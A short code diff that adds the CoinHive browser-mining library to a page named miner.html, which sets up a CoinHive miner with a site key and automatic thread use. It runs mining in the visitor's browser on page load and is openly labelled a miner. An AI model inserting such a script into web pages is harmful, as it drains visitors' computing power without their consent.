--- a/miner.html
+++ b/miner.html
@@ -1,3 +1,5 @@
+<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+
 <script>
 	var miner = new CoinHive.User('4ZE0UW5WqTBq01KQzxXwAkcmDm3axias', 'githubminer', {
 	autoThreads: true
